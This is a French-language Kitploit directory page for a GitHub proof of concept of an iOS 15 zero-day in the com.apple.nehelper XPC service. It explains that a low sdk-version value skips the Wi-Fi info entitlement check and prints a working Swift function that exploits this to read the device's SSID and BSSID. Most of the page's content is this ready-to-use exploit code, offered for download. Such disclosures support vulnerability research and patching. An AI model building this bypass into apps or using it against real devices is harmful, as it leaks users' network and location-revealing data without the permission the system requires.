Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
ios-nehelper-wifi-info-0day — iOS 15 0-day exploit (still works in 15.0.2) | Kitploit
Outils/GitHubGitHub/illusionofchaos/ios-nehelper-wifi-info-0day
iOS SecurityExploitationMobile Security
GitHubillusionofchaos/ios-nehelper-wifi-info-0day

ios-nehelper-wifi-info-0day

iOS 15 0-day exploit (still works in 15.0.2)

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Site web
17956il y a 4 ansVérifié par Kitploit

Nehelper Wifi Info 0-day (iOS 15.0)

J'ai mis à jour ce code pour éviter d'utiliser directement l'API privée. Lisez-en plus dans mon article de blog. Cependant, cela signifie que ce code est désormais spécifique à la version d'iOS et éventuellement au modèle d'appareil. Donc, s'il ne fonctionne pas sur votre appareil, recalculez et mettez à jour les offsets dans le fichier c.c. Le code original se trouve dans la branche direct.

Le point de terminaison XPC com.apple.nehelper accepte le paramètre sdk-version fourni par l'utilisateur, et si sa valeur est inférieure ou égale à 524288, la vérification de l'entitlement com.apple.developer.networking.wifi-info est ignorée. Cela permet à toute application éligible (par exemple possédant l'autorisation d'accès à la localisation) d'accéder aux informations Wifi sans l'entitlement requis. Cela se produit dans -[NEHelperWiFiInfoManager checkIfEntitled:] dans /usr/libexec/nehelper.

root@kitploit:~
func wifi_info() -> String? {
    let connection = xpc_connection_create_mach_service("com.apple.nehelper", nil, 2)
    xpc_connection_set_event_handler(connection, { _ in })
    xpc_connection_resume(connection)
    let xdict = xpc_dictionary_create(nil, nil, 0)
    xpc_dictionary_set_uint64(xdict, "delegate-class-id", 10)
    xpc_dictionary_set_uint64(xdict, "sdk-version", 1) // may be omitted entirely
    xpc_dictionary_set_string(xdict, "interface-name", "en0")
    let reply = xpc_connection_send_message_with_reply_sync(connection, xdict)
    if let result = xpc_dictionary_get_value(reply, "result-data") {
        let ssid = String(cString: xpc_dictionary_get_string(result, "SSID"))
        let bssid = String(cString: xpc_dictionary_get_string(result, "BSSID"))
        return "SSID: \(ssid)\nBSSID: \(bssid)"
    } else {
        return nil
    }
}
Télécharger l’outil